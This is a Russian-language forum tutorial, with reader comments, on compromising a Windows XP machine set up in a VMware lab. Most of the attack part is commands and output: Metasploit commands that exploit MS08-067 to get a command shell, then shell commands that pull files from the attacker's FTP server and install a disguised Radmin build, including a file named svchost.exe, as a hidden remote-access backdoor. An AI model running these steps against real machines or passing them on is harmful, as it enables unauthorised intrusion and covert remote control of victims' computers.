ВЗЛОМ ПК, под управлением Windows. — HackZona.Ru

ВЗЛОМ ПК, под управлением Windows.

ВЗЛОМ ПК, под управлением Windows.

Тип статьи:
Со старой ХакЗоны.
Источник:
#ВЗЛОМ ПК, под управлением Windows. #


КЛАССИФИКАЦИЯ АТАК.

Атаки на протокол
Атаки на ПО
Атаки на пользователя


ПОЛИГОН ДЛЯ ИСПЫТАНИЙ.

Необходимый софт:
Любой дистрибьютив Windows XP (SP2,SP3 )
Виртуальная машина Vmware.

Итак, нам нужно где-то законно, развивать свои навыки, для этого создадим виртуальную машину и установим на нее так любимый пользователями Windows, надеюсь все уже скачали виртуальную машину Vmware, устанавливаем и открываем.

Создаем новую машину в Vmware, для этого зажимаем CTRL+N, и следум инструкциям, там все интуитивно понятно. Теперь идем в Edit => Virtual Network Setting и переходим на вкладку Host Virtual Adapter

4.bp.blogspot.com/_oxXdxKIGwp0/Sa_sPqVgrSI/AAAAAAAAABU/mbkjmgkOPZw/s1600-h/4.JPG

Нажимаем add и создаем нужное количество виртуальных адаптеров. Затем идем в DHCP и удаляем от туда все адаптеры кроме, Wmnet1 и Wmnet8. Тут можно нажать Принять и ОК, или же сходить в Host Virtual Network Mapping и настроить каждому

1.bp.blogspot.com/_oxXdxKIGwp0/Sa_sYkHlZUI/AAAAAAAAABc/qjfM2pZ377g/s320/6.JPG

адаптеру свой ip, если этого не сделать, то они будут назначенны автоматически.
Заходим в настройки виртуальной манины CTR+D, переходим на вкладку Enternet, выбираем Custop Specifnc: virtual network и назначаем любой понравившейся интерфейс, конечно, кроме Wmnet1 и Wmnet8, я выбрал Vmnet2.

4.bp.blogspot.com/_oxXdxKIGwp0/Sa_tAviI_NI/AAAAAAAAABk/9KgaPlft3Vg/s320/7.JPG

Теперь переходим к CD-ROM, ставим галочку на Use ISO image, жмем обзор и выбираем образ с которого будем устанавливать Windows, мы также можем установить его с диска отметив Use physical drive, и выбрав соответствующий привод.

3.bp.blogspot.com/_oxXdxKIGwp0/Sa_tPG8Z0HI/AAAAAAAAABs/VhLjeTEXL3U/s320/8.JPG

Ну вот приготовления закончены теперь запускаем виртуальную машину и жмем F12, если вы все правильно сконфигурировали, то перед вами появится окно установки. В моем случае оно выглядит так, у вас может отличатся, завит от уставливаемой ОС. Я использовал сборку ZVERDVD.

4.bp.blogspot.com/_oxXdxKIGwp0/Sa_tbjgIAiI/AAAAAAAAAB0/lDyNMxBWq5g/s320/9.JPG

#УСТАНОВКА СВЯЗИ.#

Необходимый софт:
ФТП сервер (Serv -U)

Значит, после установки необходимо настроить сеть, между нашим реальным ПК и Виртуальным. Для этого идем в свойства подключения виртуального адаптера, который вы выбрали на вкладке Enternet у меня это Vmnet2.

3.bp.blogspot.com/_oxXdxKIGwp0/Sa_t-0smY_I/AAAAAAAAAB8/gfPFPI4pUD8/s400/11.JPG

IP адресс 192.168.1.3
Маска подсети 255.255.255.0

Теперь загружаем виртуальную машину и также идем в сетевые подключения и смотрим свойства tcp/ip.

4.bp.blogspot.com/_oxXdxKIGwp0/Sa_uM38r_JI/AAAAAAAAACE/1rMp4pVRuhc/s400/10.JPG

Настраиваем следующим образом:

IP адресс 192.168.1.10
Маска подсети 255.255.255.0
Основной шлюз 192.168.1.3

Осталось только поставить ФТП сервер на наш реальный ПК. Я выбрал Serv -U, он заводится с пол аборота. Важно, когда будете создавать пользователя, создавайте без пароля, да и вешайте фтп на стандартный 21 порт, используемый протокол тоже ФТП.

1.bp.blogspot.com/_oxXdxKIGwp0/Sa_ueYAqsjI/AAAAAAAAACM/nM1W9kgxHBY/s400/12.JPG

#ПРИМЕР.#

Необходимый софт:

Metasploit 3.2
Radmin Viewer 3
RadminServer (спец. Сборка)

Сканим комп xspider'ом

1.bp.blogspot.com/_oxXdxKIGwp0/Sa_5nXMqGLI/AAAAAAAAACs/TZRNc3_wzlA/s400/16.JPG

Для взлома мы бужем использовать, недавно обнаруженную уязвимость в службе Server(ms08_067).Запускаем Metasploit 3 Web, ждем пока загрузится и затем в адресной строке браузера пишем 127.0.0.1:55555.

3.bp.blogspot.com/_oxXdxKIGwp0/Sa_uwjg_pzI/AAAAAAAAACU/r3l9-k44ksE/s400/13.JPG

use windows/smb/ms08_067_netapi; наш сплоит

set PAYLOAD generic/shell_bind_tcp; выбираем начинку

PAYLOAD => generic/shell_bind_tcp

set RHOST 192.168.1.10; хост-жертва

RHOST => 192.168.1.10

set LPORT 7777; локальный порт

LPORT => 7777

set RPORT 445; удаленный порт
RPORT => 445


exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 — lang:Russian
[*] Selected Target: Windows XP SP3 Russian (NX)
[*] Triggering the vulnerability...
[*] Command shell session 1 opened (192.168.1.3:5583 -> 192.168.1.10:7777)

Microsoft Windows XP [¥àá¨ï 5.1.2600]
() Š®à¯®à æ¨ï Œ ©ªà®á®äâ, 1985-2001.

C:WINDOWSsystem32>


Получили командную строку на удаленной системе

{создаем в папке windows, папку helps}
cd c:windows
mkdir helps

{коннектимся к нашему компу}
ftp192.168.1.3
Пользователь (192.168.1.3:(none)): kerny

{успешный коннект, идем c:kerny нашего фтп, именно там хранится радмин}
cd c:kerny
dir

{файлы радмина}
drw-rw-rw- 1 user group 0 Mar 2 20:10 .
drw-rw-rw- 1 user group 0 Mar 2 20:10 ..
-rw-rw-rw- 1 user group 547 Mar 2 20:10 111.bat
-rw-rw-rw- 1 user group 940 Mar 2 20:10 111.reg
-rw-rw-rw- 1 user group 40448 Mar 2 20:10 AdmDll.dll
-rw-rw-rw- 1 user group 17408 Mar 2 20:10 raddrv.dll
-rw-rw-rw- 1 user group 152576 Mar 2 20:10 svchost.exe

{сливаем файлы на комп жертвы в папку windowshelps}
get 111.bat c:windowshelps111.bat
get 111.reg c:windowshelps111.reg
get AdmDll.dll c:windowshelpsAdmDll.dll
get raddrv.dll c:windowshelpsraddrv.dll
get svchost.exe c:windowshelpssvchost.exe
{отключаемся от нашего фтп}
bye

{идем в папку, и проверяем скачались ли файлы}
cd c:windowshelps
dir
-rw-rw-rw- 1 user group 547 Mar 2 20:11 111.bat
-rw-rw-rw- 1 user group 940 Mar 2 20:11 111.reg
-rw-rw-rw- 1 user group 40448 Mar 2 20:12 AdmDll.dll
-rw-rw-rw- 1 user group 17408 Mar 2 20:12 raddrv.dll
-rw-rw-rw- 1 user group 152576 Mar 2 20:12 svchost.exe

{устанавливаем Radmin у жертвы}
111.bat

4.bp.blogspot.com/_oxXdxKIGwp0/Sa_weqnkS1I/AAAAAAAAACc/de-qr4zW1Xo/s400/14.JPG

Теперь запускаем Radmin Viewer и конектимся, как видим все прошло успешно.

2.bp.blogspot.com/_oxXdxKIGwp0/Sa_wqRwzH3I/AAAAAAAAACk/A7Xi7UIkWaE/s400/15.JPG

Снял видео, там же и статья отформатированная в pdf:
ifolder.ru/10884195
kerny-auroras.blogspot.com/2009/03/windows.html

Удачи!
Нравится
Не нравится

9 комментариев

22:58
Интереснои эффективно для повышения знаний.... ГУД!
11:37
Тема! для повышея знаний)))
00:06
Автору огромное спасибо за развитие
20:08
Интересно)Так ради интереса почитать.
19:07
всё канечна супер,но с FileZilla ftp сервом некатит :( почему то не заходит, а Serv-U у меня лично запускается с 2мя ошибками, не говорю уже про то чтобы работал :))) хотя,это индивидуальные несовместимости )
13:30
пользователя создовай без пароля на фтп...
21:43
avast нашел малваря вместе с видео..обидно((
12:05
нет там малваря, это радмин, я его вместе с видосом закинул, что бы вы не искали там и другое ПО, это нормально, что палится антивирем...
20:04
Где-то видал статью, но освежить память не помешает.